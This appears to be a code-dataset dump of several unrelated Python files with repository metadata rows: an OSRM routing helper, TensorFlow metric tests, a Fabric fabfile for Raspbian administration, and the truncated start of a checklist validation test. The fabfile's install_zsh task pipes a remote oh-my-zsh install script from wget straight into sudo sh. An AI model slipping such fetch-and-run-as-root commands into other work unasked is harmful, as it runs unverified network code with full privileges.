| 899.157895 | 4,411 | 0.982264 | 90 | 17,084 | 186.411111 | 0.377778 | 0.001431 | 0.001907 | 0.003099 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0.017762 | 0 | 0.818214 | 0.010829 | 17,084 | 18 | 4,412 | 949.111111 | 0.174567 | 0 | 0 | 0.444444 | 0 | 0 | 0.959728 | 0.959026 | 0 | 1 | 0.000585 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bb14f2bc1a3530bd55d5a7fc4c81902e0babcb46 | 7,466 | py | Python | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | my_function_osrm.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | __author__ = 'Jesus'
from python_osrm.osrm import *
from models import POIS
from flask import flash
from app_core import app
RequestConfig.host = app.config['OSRM_DRIVE_ADDRESS'] # mode driving using default config.
myconfig_bicyling = RequestConfig(app.config['OSRM_BIKE_ADDRESS']) # service for mode bicyling
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
def get_trip_distance_duration(origin, destin):
"""
Return trip distance and duration between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
return (distance,duration)
def get_trip_driving(origin, destin):
"""
Return trip data between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
geometry = item.get('geometry')
return (distance,duration,geometry)
def get_trip_distance_duration_walk(origin, destin):
"""
Return trip distance and duration between two pois, by default mode of travel is walking
"""
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish, url_config = myconfig_walking)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
return (distance,duration)
def get_trip_walking(origin, destin):
"""
Return trip data between two pois, by default mode of travel is driving
"""
myconfig_walking = RequestConfig(app.config['OSRM_WALK_ADDRESS']) # service for mode walking
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
distance = 0.0
duration = 0.0
r = simple_route(coord_start,coord_finish, url_config = myconfig_walking)
if r:
info_route = r['routes']
for item in info_route:
distance = item.get('distance')
duration = item.get('duration')
geometry = item.get('geometry')
return (distance,duration, geometry)
def get_trip_duration(origin, destin):
"""
Return trip duration between two pois, by default mode of travel is driving
:param origin: coordinate(longitude, latitdue)
:param destin: coordinate of destin (longitude, latitude)
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
duration = None
r = simple_route(coord_start,coord_finish)
info_route = r['routes']
for item in info_route:
duration = item.get('duration')
break
return duration
def get_trip_duration2(origin, destin):
"""
Return trip duration between two pois, by default mode of travel is driving
"""
coord_start = [float(item) for item in origin]
coord_finish = [float(item) for item in destin]
duration = 0.0
r = simple_route(coord_start,coord_finish)
if r:
info_route = r['routes']
for item in info_route:
duration = item.get('duration')
return duration
def get_route_distances(input_poi_id, modetravel):
"""
:param input_poi_id: poi id list
:param modetravel: car, bicycle or foot
:return: distance
"""
start_poi = POIS.query.get(input_poi_id[0])
end_poi = POIS.query.get(input_poi_id[len(input_poi_id)-1])
coord_origin = []
coord_destin = []
coord_waypoints = []
route_distance = None
if start_poi:
coord_origin.append(float(start_poi.poi_lon))
coord_origin.append(float(start_poi.poi_lat ))
if end_poi:
coord_destin.append(float(end_poi.poi_lon))
coord_destin.append(float(end_poi.poi_lat ))
for index in range(1, len(input_poi_id)-1):
coord_poi = POIS.query.get(input_poi_id[index])
if coord_poi:
coord_waypoints.append((coord_poi.poi_lon, coord_poi.poi_lat ))
if modetravel == "driving":
info_driving = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints)
info_route = info_driving['routes']
for item in info_route:
route_distance = item.get('distance')
break
elif modetravel == "walking":
info_walking = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_walking)
info_route = info_walking['routes']
for item in info_route:
route_distance = item.get('distance')
break
elif modetravel == "bicycling":
info_bicycling = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_bicyling)
info_route = info_bicycling['routes']
for item in info_route:
route_distance = item.get('distance')
break
return route_distance
def get_route_duration(input_poi_id, modetravel):
"""
:param input_poi_id : poi id list
:param modetravel: car, bycicle or foot
:return: route duration
"""
# Convert input value to float
start_poi = POIS.query.get(input_poi_id[0])
end_poi = POIS.query.get(input_poi_id[len(input_poi_id)-1])
coord_origin = []
coord_destin = []
coord_waypoints = []
route_duration = None
if start_poi:
coord_origin.append(float(start_poi.poi_lon))
coord_origin.append(float(start_poi.poi_lat ))
if end_poi:
coord_destin.append(float(end_poi.poi_lon))
coord_destin.append(float(end_poi.poi_lat ))
for index in range(1, len(input_poi_id)-1):
coord_poi = POIS.query.get(input_poi_id[index])
if coord_poi:
coord_waypoints.append((coord_poi.poi_lon, coord_poi.poi_lat ))
if modetravel == "driving":
info_driving = simple_route(coord_origin,coord_destin,coord_intermediate=coord_waypoints)
info_route = info_driving['routes']
for item in info_route:
route_duration = item.get('duration')
break
elif modetravel == "walking":
info_walking = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_walking)
info_route = info_walking['routes']
for item in info_route:
route_duration = item.get('duration')
break
elif modetravel == "bicycling":
info_bicycling = simple_route(coord_origin,coord_destin,coord_intermediate= coord_waypoints,url_config=myconfig_bicyling)
info_route = info_bicycling['routes']
for item in info_route:
route_duration = item.get('duration')
break
return route_duration | 34.725581 | 129 | 0.669971 | 983 | 7,466 | 4.847406 | 0.095626 | 0.035257 | 0.045331 | 0.040294 | 0.882686 | 0.870934 | 0.870934 | 0.860441 | 0.860441 | 0.860441 | 0 | 0.004741 | 0.237209 | 7,466 | 215 | 130 | 34.725581 | 0.831958 | 0.12577 | 0 | 0.868421 | 0 | 0 | 0.055626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.026316 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb1e0b43005be838c5b7a17588214717431928ae | 8,428 | py | Python | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | 2 | 2017-07-11T13:14:48.000Z | 2017-12-10T22:14:06.000Z | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | null | null | null | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | 1 | 2019-11-13T02:15:51.000Z | 2019-11-13T02:15:51.000Z | """Test module for the liteflow.metrics module."""
import mock
import numpy as np
import tensorflow as tf
from liteflow import metrics
from liteflow import streaming
class TestStreamingMetric(tf.test.TestCase):
"""Base test class for the liteflow.metrics.StreamingMetric class."""
def test_default(self):
"""Default test case."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1], [0, 0, 1]], dtype=tf.float32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
weights_out = tf.constant([1, 0, 1], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, weights_out)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, weights, scope=scope)
func.assert_called_once_with(targets, predictions, weights)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, weights_out)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_in_none(self):
"""Test case with no weights passed to the wrapped function."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
weights_out = tf.constant([1, 0, 1], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, weights_out)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, scope=scope)
func.assert_called_once_with(targets, predictions, None)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, weights_out)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_out_none(self):
"""Test case with no weights returned by the wrapped function."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1], [0, 0, 1]], dtype=tf.float32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, None)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, weights, scope=scope)
func.assert_called_once_with(targets, predictions, weights)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, None)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_in_out_none(self):
"""Test case with no weights at all."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, None)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, scope=scope)
func.assert_called_once_with(targets, predictions, None)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, None)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
class TestAccuracy(tf.test.TestCase):
"""Test class for the liteflow.metrics.accuracy function."""
def test_default(self):
"""Default test case."""
targets = tf.constant([[2, 1, 0, 0]], dtype=tf.int32)
weights = tf.placeholder(dtype=tf.float32, shape=targets.shape)
predictions = tf.constant(
[[[0.1, 0.8, 0.1], # predicted: 1, WRONG.
[0.1, 0.8, 0.1], # predicted: 1, CORRECT.
[0.8, 0.1, 0.1], # predicted: 0, CORRECT
[0.1, 0.1, 0.8]]], # predicted: 2, WRONG.
dtype=tf.float32)
accuracy_t, weights_out_t = metrics.accuracy(targets, predictions, weights)
act_weights = np.asarray([[1, 1, 0, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
exp_accuracy = np.asarray([[0, 1, 0, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights_out = sess.run(
fetches=[accuracy_t, weights_out_t],
feed_dict={weights: act_weights})
self.assertEqual(weights, weights_out_t)
self.assertAllEqual(act_weights, act_weights_out)
self.assertAllEqual(exp_accuracy, act_accuracy)
def test_no_weights(self):
"""Test case with no weights."""
targets = tf.constant([[2, 1, 0, 0]], dtype=tf.int32)
predictions = tf.constant(
[[[0.1, 0.8, 0.1], # predicted: 1, WRONG.
[0.1, 0.8, 0.1], # predicted: 1, CORRECT.
[0.8, 0.1, 0.1], # predicted: 0, CORRECT
[0.1, 0.1, 0.8]]], # predicted: 2, WRONG.
dtype=tf.float32)
accuracy_t, weights_t = metrics.accuracy(targets, predictions)
exp_accuracy = np.asarray([[0, 1, 1, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy = sess.run(accuracy_t)
self.assertIsNone(weights_t)
self.assertAllEqual(exp_accuracy, act_accuracy)
class TestPerSentenceAccuracy(tf.test.TestCase):
"""Test class for the liteflow.metrics.per_sentence_accuracy function."""
def test_default(self):
"""Default test case."""
targets = tf.constant([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=tf.int32)
predictions = tf.constant([[1, 2, 3, 0], [1, 2, 3, 0]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1, 1], [1, 1, 1, 0]], dtype=tf.float32)
accuracy_t, weights_t = metrics.per_sentence_accuracy(targets, predictions, weights)
exp_accuracy = np.asarray([0, 1], dtype=np.float32) # pylint: disable=I0011,E1101
exp_weights = np.asarray([1, 1], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights = sess.run([accuracy_t, weights_t])
self.assertAllEqual(act_accuracy, exp_accuracy)
self.assertAllEqual(act_weights, exp_weights)
def test_no_weights(self):
"""Test case for weightless metric."""
targets = tf.constant([[1, 2, 3, 4], [1, 2, 3, 0]], dtype=tf.int32)
predictions = tf.constant([[1, 2, 3, 0], [1, 2, 3, 0]], dtype=tf.int32)
accuracy_t, weights_t = metrics.per_sentence_accuracy(targets, predictions)
exp_accuracy = np.asarray([0, 1], dtype=np.float32) # pylint: disable=I0011,E1101
exp_weights = np.asarray([1, 1], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights = sess.run([accuracy_t, weights_t])
self.assertAllEqual(act_accuracy, exp_accuracy)
self.assertAllEqual(act_weights, exp_weights)
if __name__ == '__main__':
tf.test.main()
| 40.325359 | 98 | 0.622093 | 1,102 | 8,428 | 4.622505 | 0.098004 | 0.013349 | 0.03298 | 0.023557 | 0.895563 | 0.881037 | 0.850805 | 0.827444 | 0.809973 | 0.779348 | 0 | 0.05173 | 0.238491 | 8,428 | 208 | 99 | 40.519231 | 0.741976 | 0.103346 | 0 | 0.790541 | 0 | 0 | 0.010158 | 0 | 0 | 0 | 0 | 0 | 0.222973 | 1 | 0.054054 | false | 0 | 0.033784 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2481606a34fbd5d1a5d906c37dcdc1b3f3e28163 | 9,422 | py | Python | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | import json
from fabric import task, Connection
import invoke
from termcolor import colored
@task(aliases=["raspbian的更新包管理器"])
def apt_update(c: Connection) -> None:
"""更新包管理器."""
try:
result = c.sudo("""sudo apt update -y""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["重启机器"])
def reboot(c: Connection) -> None:
try:
result = c.sudo("""sudo reboot""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["更新内核"])
def apt_upgrade(c: Connection) -> None:
"""更新内核并重启"""
apt_update(c)
try:
a = "press q to quit"
result = c.sudo("""sudo apt upgrade -y""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
reboot(c)
@task(aliases=["raspbian的apt换源"])
def raspbian_apt_change_mirror(c: Connection) -> None:
"""换源后更新包和内核然后重启."""
try:
result = c.sudo("""sh -c 'echo "deb http://mirrors.ustc.edu.cn/raspbian/raspbian/ stretch main contrib non-free rpi" > /etc/apt/sources.list'""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
try:
result = c.sudo("""sh -c 'echo "deb http://mirrors.ustc.edu.cn/archive.raspberrypi.org/debian/ stretch main ui" > /etc/apt/sources.list.d/raspi.list'""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
apt_upgrade(c)
@task(aliases=["安装包"])
def install_package(c: Connection, package: str) -> None:
"""安装nano和vim并设置美化vim."""
try:
result = c.sudo(f"apt-get install -y {package}", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["安装zsh"])
def install_zsh(c: Connection) -> None:
"""安装zsh并安装oh-my-zsh."""
install_package(c, package="zsh")
try:
result = c.sudo("wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
reboot(c)
@task(aliases=["安装编辑器"])
def install_editor(c: Connection) -> None:
"""安装nano和vim并设置美化vim."""
install_package(c, package="nano")
install_package(c, package="vim")
try:
result = c.sudo("update-alternatives --display vi", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
try:
result = c.put(local="vimrc", remote=".vimrc")
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"put file on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["状态"])
def check_status(c: Connection) -> None:
# 检查硬盘使用状态
try:
result = c.sudo("df -h", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
# 检查内存使用状态
try:
result = c.sudo("free -m", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
# 检查io和cpu使用情况
try:
result = c.sudo("iostat 1 1", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["清除缓存"], help={"level": "清空缓存的等级, 只能是1, 2, 3."})
def free_cache(c: Connection, level=1) -> None:
if level not in (1, 2, 3):
raise AttributeError("等级只能是1,2,3")
try:
result = c.sudo(f"sh -c 'echo {level} > /proc/sys/vm/drop_caches'", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
| 34.386861 | 172 | 0.613776 | 1,239 | 9,422 | 4.615012 | 0.121872 | 0.102833 | 0.13851 | 0.067156 | 0.804302 | 0.789087 | 0.789087 | 0.789087 | 0.789087 | 0.789087 | 0 | 0.001684 | 0.243473 | 9,422 | 273 | 173 | 34.512821 | 0.800505 | 0.012842 | 0 | 0.819672 | 0 | 0.061475 | 0.244713 | 0.077579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036885 | false | 0 | 0.016393 | 0 | 0.053279 | 0.254098 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24ae8ac22a3291f73cab53622705ffed0df929ea | 47 | py | Python | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 1,816 | 2018-02-14T01:59:51.000Z | 2022-03-31T17:09:20.000Z | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 340 | 2018-02-11T00:27:26.000Z | 2022-03-21T12:00:24.000Z | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 144 | 2018-03-18T00:08:16.000Z | 2022-02-26T01:51:58.000Z | from .RouteListCommand import RouteListCommand
| 23.5 | 46 | 0.893617 | 4 | 47 | 10.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
24c2fd4d186296298b0396a414c256dbda7a22f4 | 101 | py | Python | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | null | null | null | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | 2 | 2021-11-22T16:31:41.000Z | 2022-03-16T12:00:14.000Z | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | null | null | null | from devito.ir.ietxdsl.operations import * # noqa
from devito.ir.ietxdsl.cgeneration import * # noqa
| 33.666667 | 50 | 0.782178 | 14 | 101 | 5.642857 | 0.571429 | 0.253165 | 0.303797 | 0.481013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 101 | 2 | 51 | 50.5 | 0.88764 | 0.089109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
24ea84a4e2434db6b721d27ad75f063197b1d598 | 14,855 | py | Python | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | 4 | 2015-10-25T15:43:06.000Z | 2021-05-06T03:18:23.000Z | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | null | null | null | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | null | null | null | """Validate the protocol in each downloaded checklist.
Validation Tests:
Protocol:
1. the protocol is a dict.
ProtocolName:
1. name is a string.
2. name is set.
3. name does not have leading/trailing whitespace.
ProtocolTime:
1. time is a string.
2. time has the format 'dd:dd'
ProtocolDuration
1. duration hours is an int.
2. duration minutes is an int
ProtocolDistance
1. distance is an int.
ProtocolArea
1. area is an int.
EbirdProtocolName
1. The protocol names matches the values used on ebird.
WorldBirdsProtocolName
1. The protocol names matches the a default value used for WorldBirds.
"""
from checklists_scrapers.tests.validation import checklists, ValidationTestCase
class Protocol(ValidationTestCase):
"""Validate the protocols in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
def test_protocol_type(self):
"""Verify the protocols field contains a dict."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol, dict, msg=source)
class ProtocolName(ValidationTestCase):
"""Validate the protocol name in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
def test_name_type(self):
"""Verify the protocol name is a unicode string."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['name'], unicode, msg=source)
def test_name_set(self):
"""Verify the protocol name is set."""
for protocol, source in self.protocols:
self.assertTrue(protocol['name'], msg=source)
def test_name_stripped(self):
